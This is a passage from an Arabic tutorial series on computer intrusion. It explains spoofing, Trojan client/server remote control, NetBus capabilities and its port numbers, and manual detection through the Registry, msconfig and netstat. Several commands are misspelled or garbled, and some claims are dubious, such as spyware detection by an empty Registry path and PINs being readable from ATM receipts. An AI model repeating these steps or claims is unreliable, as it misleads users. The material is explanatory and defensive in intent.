    المصدر Source Routing فإن حزم الـ IP قد تم اعطائها شكلا تبدو معه وكأنها

    قادمة من كمبيوتر معين بينما هي في حقيقة الأمر ليست قادمة منه وعلى ذلك

    فإن النظام إذا وثق بهوية عنوان مصدر الحزمة فإنه يكون بذلك قد حوكي

    (خدع) وهذة الطريقة هي ذاتها التي نجح بها مخترقي الهوت ميل في الولوج

    الي معلومات النظام قبل شهرين.

    2- إختراق الأجهزة الشخصية والعبث بما تحوية من معلومات وهي طريقة للأسف

    شائعة لسذاجة اصحاب الأجهزة الشخصية من جانب ولسهولة تعلم برامج

    الأختراقات وتعددها من جانب اخر.

    3- التعرض للبيانات اثناء انتقالها والتعرف على شيفرتها إن كانت مشفرة وهذة

    الطريقة تستخدم في كشف ارقام بطاقات الأئتمان وكشف الأرقام السرية

    للبطاقات البنكيه ATM وفي هذا السياق نحذر هنا من امرين لايتم الأهتمام بهما

    بشكل جدي وهما عدم كشف ارقام بطاقات الأئتمان لمواقع التجارة الألكترونية

    إلا بعد التأكد بألتزام تلك المواقع بمبداء الأمان . أما الأمر الثاني فبقدر ماهو ذو

    أهمية أمنية عالية إلا أنه لايؤخذ مأخذ الجديه . فالبعض عندما يستخدم بطاقة

    السحب الألي من مكائن البنوك النقدية ATM لاينتظر خروج السند الصغير المرفق

    بعملية السحب او انه يلقي به في اقرب سلة للمهملات دون ان يكلف نفسه عناء

    تمزيقة جيدا . ولو نظرنا الي ذلك المستند سنجد ارقاما تتكون من عدة خانات

    طويله هي بالنسبة لنا ليست بذات أهمية ولكننا لو أدركنا بأن تلك الأرقام

    ماهي في حقيقة الأمر الا إنعكاس للشريط الممغنط الظاهر بالجهة الخلفية لبطاقة

    الـ ATM وهذا الشريط هو حلقة الوصل بيننا وبين رصيدنا بالبنك الذي من خلالة

    تتم عملية السحب النقدي لأدركنا اهمية التخلص من المستند الصغير بطريقة

    مضمونه ونقصد بالضمان هنا عدم تركها لهاكر محترف يمكنه استخراج رقم

    الحساب البنكي بل والتعرف على الأرقام السرية للبطاقة البنكية ATM .

    *** اثار الأختراق:***

    1- تغيير الصفحة الرئيسية لموقع الويب كما حدث لموقع فلسطيني مختص

    بالقدس حيث غير بعض الشباب الإسرائيلي الصور الخاصة بالقدس الي صور تتعلق

    بالديانه اليهودية بعد عملية إختراق مخطط لها.

    2- السطو بقصد الكسب المادي كتحويل حسابات البنوك او الحصول على خدمات

    مادية او اي معلومات ذات مكاسب مادية كأرقام بطاقات الأئتمان والأرقام

    السرية الخاصة ببطاقات الـ ATM

    3- إقتناص كلمات السر التي يستخدمها الشخص للحصول على خدمات مختلفة

    كالدخول الي الانترنت حيث يلاحظ الضحية ان ساعاته تنتهي دون ان يستخدمها

    وكذلك انتحال شخصية في منتديات الحوار .

    والأن وبعد هذة العجالة هل فكرتم بخطورة الاختراق ؟! هل خطر على احدكم

    بأن جهازة قد اخترق ؟؟ وكيف له أن يعرف ذلك قبل أن يبداء التخلص من ملفات

    التجسس ؟ هذة الأمور وامور أخرى تهمنا جميعا سنتطرق اليها في الحلقة

    الدراسية القادمة إن شاء الله
    الاختراق ج2
    ________________________________________

    بسم الله الرحمن الرحيم



    الدرس الثانى

    اكمال للدرس الأول



    فقد وضعنا مسبقا تعاريف عن الهاكر والكراكر سوف اوردها هنا ايضا مع

    بعض الأيضاحات التي تتطلب وجودها هنا في درسنا اليوم


    =============


    تعريف الهاكر


    أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة

    القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا

    يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب .

    بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد

    ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك

    الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات

    والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني

    الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع

    الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية

    ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون

    رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة

    الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز

    ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers. كان الهاكرز في تلك الحقبة

    من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم

    أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق

    البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا

    في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي

    وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس

    الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد

    الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب

    الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر

    او التحطيم وهي الصفة التي يتميزون بها .


    ==================

    أنواع الكراكرز

    قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على

    كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على

    كل حال ينقسمون الي قسمين :

    1- المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص

    كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج

    التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا

    بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن

    كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى

    ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة

    الحال احد المحترفين.

    2- الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب

    بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة

    ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها

    حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها

    وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى

    المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة

    وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات

    الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى

    لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات

    المنتجه.

    (( ينقسم الهواة كذلك الي قسمين )) :

    1- الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي

    السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد

    السيطرة لا أكثر .

    2- المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم

    دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع

    دون أن يدري بما يفعله.

    ==============

    الكراكرز بالدول العربية:

    للأسف الشديد كثير من الناس بالدول العربية يرون بأن الكراكرز هم أبطال

    بالرغم أن العالم كلة قد غير نظرته لهم. فمنذ دخول خدمة الأنترنت للدول العربية

    في العام 1996 تقريبا والناس يبحثون عن طرق قرصنه جديدة وقد ذكرت اخر

    الحصائيات بأن هناك اكثر من 80% من المستخدمين العرب تحتوي اجهزتهم على

    ملفات باتش وهي ملفات تسهل عمل الكراكرز ( ساشرح في نهاية هذا الجزء

    ثلاث طرق إختبارية للكشف عن ملفات الباتش بالأجهزة الشخصية).

    (( الكراكرز بدول الخليج العربي )) :

    إنتشرت ثقافة الكراكرز كثيرا بدول الخليج العربي خصوصا بالسعودية على

    رغم دخولها المتأخر لخدمة الأنترنت (يناير 1999) حيث كثرت الشكاوي من عدة

    افراد وشركات وقد بين الأستبيان الذي أجرته مجلتين عربيتين متخصصتين هما

    بي سي و إنترنت العالم العربي أن بعض الأجهزة بالدول الخليجية تتعرض

    لمحاولات إختراق مرة واحدة على الأقل يوميا.

    __________ إختبار الكشف عن ملفات التجسس Patch Files : _______-

    توجد طرق عديدة لإكتشاف وجود ملفات يمكن من خلالها تضييق الخناق على

    ملفات التجسس في حال إكتشافها والتخلص منها نهائيا لقطع الطريق على

    الكراكرز

    المتصل بجهاز الضحية وهي على النحو التالي :

    الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :

    1- أنقر على إبداء Start

    2- أكتب في خانة التشغيل Run الأمر : rigedit

    3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :

    - HKEY_LOCAL_MACHINE

    - Software

    - Microsoft

    - Windows

    - Current Version

    - Run

    4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة

    بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع

    قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .

    5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة

    سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.

    6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete

    --------------------------

    الطريقة الثانية بواسطة الأمر :msconfig

    1- انقر ابداء Start

    2- اكتب في خانة التشغيل Run الأمر التالي : msconfig

    3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up

    4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل

    5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت

    بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون

    بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.

    --------------------------

    الطريقة الثالثة بواسطة الدوس Dos:

    هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :

    1- إفتح الدوس من محث MSDos بقائمة إبداء

    2- أكتب الأمر التالي : C:/Windowsdir patch.*

    3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:

    C:Windowsdelete patch.*

    في الحلقة الدراسية القادمة إن شاء الله سنتعلم ميكانيكية الاختراق وكيف يتم

    عن طريق الريموت والسيطرة على الأجهزة والأنظمة عن بعد وسنتطرق للبرامج

    التي تستخدم في ذلك وطريقة عملها (كيف تعمل وليس كيف يعمل بها) وأيضا

    سنتحدث عن الطرق التي يمكن بها إعاقة عمل تلك البرامج دون علم من

    الكراكرز .
    __________________________________________________ __

    الاختراق ج3
    ________________________________________

    بسم الله الرحمن الرحيم



    الدرس الثالث
    ___________ ميكانيكية الإختراق _________
    يعتمد الاختراق على السيطرة عن بعد Remote وهي لاتتم الا بوجود عاملين

    مهمين : الأول البرنامج المسيطر ويعرف بالعميل Client والثاني الخادم Server

    الذي يقوم بتسهيل عملية الأختراق ذاتها.

    وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي

    جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل .

    تختلف طرق إختراق الأجهزة والنظم بإختلاف وسائل الإختراق ، ولكنها جميعا

    تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم

    (server) الخاص بالمخترق ، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج

    المستفيد او العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك :

    1) عن طريق ملفات أحصنة طروادة Trojan : لتحقيق نظرية الأختراق لابد من توفر

    بريمج تجسسي يتم إرسالة وزرعة من قبل المستفيد في جهاز الضحيه ويعرف

    بالملف اللاصق ويسمى (الصامت) أحيانا وهوملف باتش patch صغير الحجم مهمته

    الأساسية المبيت بجهاز الضحيه (الخادم) وهو حلقة الوصل بينه وبين المخترق

    (المستفيد) .

    _________كيفية الإرسال والاستقبال : _____-

    تقوم الفكرة هنا على إرسال ملف باتش صغير هذا الملف يعرف باسم حصان

    طروادة لأنه يقوم بمقام الحصان الخشبي الشهير في الأسطورة المعروفة الذي

    ترك امام الحصن وحين ادخله اليه الناس خرج من داخلة الغزاة فتمكنوا من

    السيطرة والإستيلا على الحصن . ملفنا الصغير الفتاك هذا ربما يكون اكثر خبثا

    من الحصان الخشبي بالرواية لأنه حالما يدخل لجهاز الضحية يغير من هيئته فلو

    فرضنا بأن إسمه mark.exe وحذرنا منه صديق فأننا سنجده يحمل اسما اخرا

    بعد يوم او يومين . لهذا السبب تكمن خطورة احصنه طراودة فهي من جانب

    تدخل للأجهزة في صمت وهدوء ، ويصعب اكتشافها من جانب اخر في حالة عدم

    وجود برنامج جيد مضاد للفيروسات .

    لاتعتبر احصنة طروادة فيروسات وإن كانت برامج مضادات الفيروسات تعتبرها

    كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد

    سيطرة تامه على جهاز الضحية عن بعد وتكمن خطورتها في كونها لاتصدر اية

    علامات تدل على وجودها بجهاز الخادم.

    _______--كيفية الأرسال :


    تتم عملية إرسال بريمجات التجسس بعدة طرق من اشهرها البريد الألكتروني

    حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد

    به برنامج الباتش المرسل فيظنه برنامجا مفيدا فيفتحه او أنه يفتحه من عامل

    الفضول ليجده لايعمل بعد فتحة فيتجاهلة ظانا بأنه معطوب ويهمل الموضوع

    بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز ( يقوم

    بعض الأشخاص بحذف الملف مباشرة عند إكتشافهم بأنه لايعمل ولكن يكون قد

    فات الأوان لأن ملف الباتش من هذا النوع يعمل فورا بعد فتحة وإن تم حذفه كما

    سنرى فيما بعد) .

    هناك طرق أخرى لزرع أحصنه طروادة غير البريد الألكتروني كأنتقاله عبر

    المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من احد

    المواقع الغير موثوق بها . كذلك يمكن اعادة تكوين حصان طروادة من خلال

    الماكرو الموجودة ببرامج معالجات النصوص.

    __________كيفية الإستقبال:

    عند زرع ملف الباتش في جهاز الضحية (الخادم) فأنه يقوم مباشرة بالأتجاه الي

    ملف تسجيل النظام Registry لأنه يؤدي ثلاثة امور رئيسية في كل مرة يتم فيها

    تشغيل الجهاز : (1) فتح بوابة او منفذ ليتم من خلالها الاتصال (2) تحديث نفسه

    وجمع المعلومات المحدثة بجهاز الضحية إستعدادا لأرسالها للمخترق فيما بعد (3)

    وتحديث بيانات المخترق (المستفيد) في الطرف الأخر . تكون المهمة الرئيسية

    لملف الباتش فور زرعة مباشرة فتح منفذ إتصال داخل الجهاز المصاب تمكن

    برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس

    بتسجيل كل مايحدث بجهاز الضحية او انه يقوم بعمل اشياء اخرى حسب مايطلبه

    منه المستفيد كتحريك الماوس او فتح باب محرك السي دي وكل ذلك يتم عن

    بعد.

    ______--بوابات الأتصال Ports

    يتم الاتصال بين الجهازين عبر بوابات ports او منافذ اتصال وقد يظن البعض

    بأنها منافذ مادية في امكانه رؤيتها كمنافذ الطابعة والفأرة ولكنها في واقع

    الأمر جزء من الذاكرة له عنوان معين يتعرف علية الجهاز بأنه منطقة إتصال يتم

    عبره ارسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للأتصال

    وعددها يزيد عن 65000 يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001

    يمكن اجراء اتصال عن طريقة وفي تفس اللحظه يتم استخدام المنفذ رقم 2001

    لإجراء اتصال اخر.

    ________-التواصل :

    قلنا بأن المخترق قد تمكن من وضع قدمة الأولى بداخل جهاز الضحية بعد زرع

    ملف الباتش به ورغم خطورة وجود هذا الملف بجهاز الضحية فأنه يبقى في حالة

    خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ مايصدر له من

    اوامر ولكن بدونه لايتمكن المخترق من السيطرة على جهاز الضحية عن بعد ،

    وحتى يتم له ذلك، فإن على المخترق بناء حلقة وصل متينه بينه وبين الخادم عن

    طريق برامج خاصة تعرف ببرامج الإختراق . من جانب اخر تبقى احصنة طروادة

    عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة

    حالما يتم اكتشافها والتخلص منها كما اوضحت بالحلقة الدراسية السابقة. وهناك

    عامل ممتاز يساهم في تحقيق هذة الميزة فبرامج مضادات الفيروسات الجيدة

    تكتشف ملفات الباتش الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة لهذا

    يؤكد كل من له المام بالمعلوماتية أن تزود دائما الأجهزة الشخصية ببرامج

    مضادات الفيروسات وتحديثها بين الحين والأخر لأنها الخطوة الأولى للوقاية من

    الأختراقات ، كذلك علينا أن نتعود على عدم تمكين عامل الفضول من الولوج

    الي انفسنا فلانفتح اية مرفقات للبريد الألكتروني مجهول المصدر مهما كانت

    المغريات.

    2) عن طريق الـ IP Address : ذكرت بأن ملفات الباتش الحاملة لأحصنة طروادة

    هي حلقة الوصل بين المخترق والضحية ، ولكن في واقع الأمر فإن ملفات الباتش

    ليست إلا طريقة واحدة لتحقيق التواصل . عند إتصالك بالأنترنت تكون معرض

    لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص

    بك وتسجيل كثير من تحركاتك على الشبكة. ولاتتعجب كثيرا حين تعلم بأن

    كثيرا من المواقع التي تزورها تفتح سجلا خاصا بك يتضمن عنوان الموقع الذي

    جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع

    معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة.

    كيف تم معرفة كل ذلك ؟ يمكنك التحقق من هذا السؤال لو انك زرت الموقع التالي :

    http://www.privacy.net/

    او الموقع التالي :

    http://www.consumer.net/

    بعد التسجيل اطلب من احد الموقعين فحص جهازك اثناء اتصالك بالأنترنت

    وستفاجأ بالنتيجة .

    مبدئيا عنوانك الخاص بالأنترنت Internet Protocol او IP يكشف الكثير عنك فكل

    جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بأسم الـ IP Address

    وكل عنوان لموقع على الأنترنت يترجم الي IP Address الخاص بمزود الخدمة

    وبأختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الأنترنت. حينما

    يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فأنه من خلالة يتمكن

    من الولوج الي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية

    متصلا بالشبكة فقط ، ولكن هذا الخيار لايخدم المخترق كثيرا لأن السيرفر الخاص

    بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائيا عند كل عملية

    دخول للشبكة . يمكنك أن تجرب ذلك بنفسك بالطريقة التالية:

    أثناء إتصالك بالشبكة ومن قائمة إبداء إختر تشغيل واكتب الأمر التالي في

    المستطيل الظاهر : winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة

    واقطع اتصالك . أعد الأتصال مرة اخرى بالشبكة وقم بالأجراء السابق ستجد أن

    عنوان الـ IP الخاص بك قد تغير.


    3) عن طريق الكوكي ****ie :

    يمكن ايضا تحقيق التواصل للأختراق عن طريق الكوكي ****ie وهي عباراة

    عن ملف صغير تضعة بعض المواقع التي يزورها المستخدم على قرصة الصلب .

    هذا الملف به اليات تمكن الموقع الذي يتبع له جمع وتخزين بعض البيانات عن

    الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما وأنها تسرع عمليات

    نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري

    ولكنه يساء إستخدامة من قبل بعض المبرمجين المتمرسين بلغة الجافا Jafa

    فهذة اللغة لديها قدرات عالية للتعمق اكثر لداخل الأجهزة والحصول على

    معلومات اكثر عن المستخدم. لايفضل منع الكوكيز كليا ولكن يمكن فلترتها من

    خلال المتصفح او ببعض البرامج كالجارد دوق .

    وبعد فإن ميكانيكية الأختراق تتم مبدئيا بوضع بريمج الخادم بجهاز الضحية ويتم

    الأتصال به عبر المنفذ port الذي فتحة للمستفيد (المخترق) في الطرف الأخر ولكن

    حلقة الوصل هذة تنقصها المعابر وهي البرامج المخصصة للأختراق وهذة الأخيرة


    سأتطرق اليها في الحلقة الدراسية القادمة إن شاء الله حيث سأشرح كيف تعمل

    برامج الأختراق ، وكيف علينا أن نتعامل معها ، وكيف نوهم المخترق بنجاح

    إختراقة بينما هو يجري خلف سراب

    الاختراق ج4
    ________________________________________

    بسم الله الرحمن الرحيم



    الدرس الرابع

    ________البرامج المؤذية - Harmful Software

    الاختراق ليس الا احد انواع التدمير الممكنه عبر البرامج المؤذية ، لذلك فالمخاطر

    التي يتعرض لها مستخدم الكمبيوتر العادي تتنوع بتنوع واختلاف البرامج

    المؤذية وامكاناتها وإن كان الاختراق هو اخطرها وابرزها.


    ___________المخاطر وانواع البرامج المؤذية:

    تتراوح المخاطر التي يتعرض لها المستخدم من مجرد ازعاج بسيط الي مستوى

    الكارثة وقد صنف المؤلفين الثلاثة هذة المخاطر الي اربعة اصناف:

    1- القتابل وبرامج الطوفان Flooders/Bombers حيث يفاجأ المستخدم بوجود

    مئات الرسائل في عنوانه الألكتروني او عبر برنامج الـ ICQ من اشخاص

    وعناوين لم يسمع بهم من قبل وهذا الصنف من المخاطر هو الأقل خطوره حيث

    انه يسبب ازعاجا ومضيعا للوقت لا اكثر .

    2- الخداع Spoofing شرحت هذا الخطر سابقا وهو عملية تمويه وطمس للهويه

    حيث تتم سرقة حساب الدخول للأنترنت بأسم المستخدم فيجد ساعاته تنقص دون

    ان يستخدمها او يتم من خلالة سرقة كلمة السر في ساحات الحوار فتكتب مقالات

    لم يكتبها في حقيقة الأمر المستخدم الحقيقي.

    3- التدمير من خلال برامج الـ Nukers تقوم هذة البرامج بتعطيل نظام التشغيل

    ويتراوح خطرها بين تغيير الوقت بساعة النظام وبين توقف النظام كليا عن

    العمل وتوجد انواع منها تركز على برنامج معين لتدميره دون الحاق الضرر بنظام

    التشغيل ذاته.

    4- الباب الخلفي Backdoor هذا الصنف هو الأخطر وهو المحور الذي يدور حوله

    موضوع هذة الدوره الدراسية ، وهو الشائع بين كل المخترقين لأنه يجعل

    المخترق قادرا على الدخول لجهاز الضحية والسيطره عليه كليا او جزئيا بحسب

    البرنامج المستخدم . البعض يظن خطأ بأن الـ Backdoor اسم برنامج للأختراق

    ولكنه تعبير مجازي ويعني بالعربية الدخول من الباب الخلفي الغير مرئي وعن

    طريقة يتم دخول المخترقين لجهاز الضحية .


    ______أشهر برامج الأختراق وكيفية عمل كل منها: ______-


    كثيرة هي برامج الأختراق ومتعدده ولكن هناك نظرية سائدة تشمل الجانب ا

    لنفسي للمخترقين وهي البساطة في التعامل مع برنامج الأختراق والحصول

    على ما خف وزنه وغلاء ثمنه من جهاز الضحيه Easy to Go ، وبمعنى أخر فأن

    المخترق لايرغب في برنامج معقد يأخذ كثيرا من الوقت في تعلمه وكذلك

    لايرغب بعد تعلم البرنامج واتقانه الدخول الي جهاز خاوي لاسمن فيه ولاعسل .

    لهذا السبب نجد بأن هناك ثلاثة برامج شهيرة ومعروفة يستخدمها المخترقون

    في كل أرجاء المعمورة لبساطة تعلمها وسهولة إتقانها وفي نفس الوقت

    خطورة ما تقوم به . هذة البرامج الثلاث سأشرحها بالتفصيل مركزا على ثلاثة

    عوامل فيهم (1) إمكانات كل برنامج (2) كيفية إكتشافة في الأجهزة (3) كيفية

    التخلص منه وجعل المخترق يجري خلف سراب .

    _____________برامج الأختراق المتداولة: ____________


    هذة قائمة بأشهر البرامج المتداولة مرتبة حسب خطورتها ، وسأكتفي بشرح

    الثلاثة الأولى منها لشهرتها وتداولها بين المخترقين في ارجاء المعمورة قاطبة:

    1- Net Bus

    2- Back Orifice

    3- Sub Seven

    4- Hack a Tack

    5- Master Paradise

    6- Deep Throat

    7- Girl Friend

    8- Net Sphere

    9- Win Crash

    10- Big Cluck

    11- Executer

    1- برنامج الـ Net Bus : تمكن مبرمج سويدي إسمه كارل نيكتر في عام 1998

    من إصدار نسخة تجريبيه تعمل على الويندوز 95 من برنامج لم يطلق عليه اسما

    وقتها . ذلك البرنامج يمكن مستخدمه من تشغيله بواسطة كمبيوتر بعيد (ريموت)

    بنفس الفكرة التي ذكرتها في الفصل السابق هذا البرنامج سماه اتوبيس الشبكة

    Net Bus صدرت بعد ذلك نسخ عديده منه اذكر منها نسخة 1.6 و 1.7 و Net Bus

    Pro وأخيرا Net Bus 2000 .

    إمكانات برنامج Net Bus : يسمح البرنامج لأي شخص بالسيطرة على جهاز

    ______-الضحية عن بعد (ريموت) بالشكل التالي:

    1- عرض صورة مفاجئة على شاشة الضحية او تغيير اعدادات الشاشة دون تدخل من المستخدم

    2- استبدال مفاتيح الماوس الأيمن والايسر

    3- تشغيل برنامج معين بصورة مفاجئة

    4- فتح و غلق باب سواقة الـ CD تلقائيا دون تدخل من المستخدم

    5- عزف اي ملف صوتي فجأه

    6- وضع مؤشر الماوس في نطاق معين من الشاشة لا يستطيع المستخدم ان يتعداه

    7- تحريك مؤشر الماوس دون ان يفعل ذلك المستخدم الاصلي

    8- عرض رسالة قصيرة على الشاشة تختفي فجأة او تبقى معلقة دائما بالشاشة لايستطيع المستخدم التخلص منها.

    9- قفل واعادة تشغيل الجهاز Rebooting بطريقة مفاجئة

    10- الذهاب الي موقع معين على الويب

    11- التجسس على المستخدم ورؤية اية كلمات يكتبها

    12- التقاط صور لسطح المكتب عن بعد

    13- ارسال معلومات لكومبيوتر المخترق عبر بريمج الباتش المزروع بجهاز الضحية

    14- عرض محتويات القرص الصلب بالكامل عن بعد

    15- انزال downloading اي ملف من جهاز الضحية لجهاز المخترق

    16- تحميل upload اي ملف من جهاز المخترق لجهاز الضحيه

    17- التحكم في علو وانخفاض الصوت

    18- في حالة ارتباط مايكروفون بجهاز الضحية فيمكن للمخترق الأستماع لما يدور من حديث بالغرفة المتواجد بها جهاز الضحية

    19- حذف اي ملف من القرص الصلب عن بعد

    20- الغاء disable عمل مفاتيح معينه من لوحة المفاتيح

    21- اقفال اي نافذة من النوافذ المفتوحة بشاشة الضحية

    22- فتح نوافذ معينه بطريقة مفاجئة

    23- اضافة كلمة سر لجهاز الضحية تمنعه من الدخول لجهازه

    24- تغيير او حذف كلمات السر الخاصة بالضحية واستبدالها بكلمات اخرى

    25- تغيير اعدادات النظام بالجهاز الخاص بالضحيه كل هذة الوظائف السابقة

    يمكن لأي مخترق لديه هذا البرنامج او اي برنامج للأختراقات مع اختلاف قدراتها

    أن يستخدمها على كمبيوتر الضحية المزروع به الملف الخادم (ملف الباتش).

    قد يسبب ما ذكرت اعلاه شئ من الخوف او الوسوسة لمن ظهر في جهازه احد

    او بعض الأعراض المذكوره ولكني انصحه ان لا يستعجل الأمور وقبل اتخاذه لأي

    قرار عليه اولا الكشف على جهازه والبحث عن اي ملف تجسسي مزروع به عن

    طريق الوسائل الثلاث التي ذكرتها في الفصل الأول . هذا من جانب ، اما جانب

    اخر فأن المخترق لكي يتمكن من الأختراق عليه الدخول من احد المنافذ ports

    والبرامج المضادة للمخترقين والتي ساشرحها في الفصل الثالث إن شاء الله

    كفيلة بأغلاق تلك المنافذ في وجه المخترق ولكن حتى نقطع الطريق هنا على

    المخترق فإليكم طريقة فذة لأكتشاف المنافذ المفتوحة واغلاقها بطريقة يدويه

    من خلال الويندوز ويجب تنفيذ هذا الأجراء اثناء الإتصال بالأنترنت online :

    1- من قائمة إبداء اختر تشغيل

    2- عند ظهور مربع الحوار الخاص بتنفيذ الأوامر اكتب Command

    3- سيظهر لك اطار نظام التشغيل دوس وفي داخل الأطار وامام خانة المؤشر

    اكتب : netstat-a ثم اضغط Enter

    4- عند تنفيذ الخطوة السابقة سيتم عرض جميع المنافذ المفتوحة بجهازك وهي

    التي تلي الرمز (: ) مباشرة ، أما ماقبل الرمز فهو اسم الكمبيوتر الخاص بك

    الذي تم تعريفه عند تجهيز شبكة الأتصال .

    5- والأن قارن ارقام المنافذ التي ظهرت لك مع ارقام المنافذ التالية وهي المنافذ

    التي يفتحها في العادة ملف التجسس (الباتش) لبرنامج الـ Net Bus فإن وجدت

    رقم المنفذ ضمنها فإن جهازك قد أخترق وعليك في هذة الحالة التخلص اولا من

    ملف التجسس كما تم شرحة في الفصل السابق ثم اغلاق المنفذ

    المفتوح كما سيتم شرحة لاحقا:

    منافذ Ports دخول برنامج النت باص :

    20034

    1045

    4590

    6711

    7300

    7301

    7306

    7303

    7308

    30029

    30100

    30101

    30102

    31337

    31338

    31339

    التخلص من برنامج النت باص واغلاق منافذه المفتوحة: الرابط الرئيسي بين

    كمبيوتر المخترق وكمبيوتر الضحية هو ملف التجسس المزروع بالأخير ومتى ماتم

    تحديده والتخلص منه قطعت عليه سبل التجسس اما المنافذ التي فتحت فهي كما

    شرحناها بالفصل السابق جزء من الذاكرة يتعرف عليها الجهاز بانها منطقة

    اتصال ومتى ما تم حذف ملف التجسس (الباتش) فأن الويندوز يعيد اغلاق تلك

    المنافذ عقب اعادة تشغيل الجهاز لأن مصدرها (ملف الباتش) قد قضي عليه.

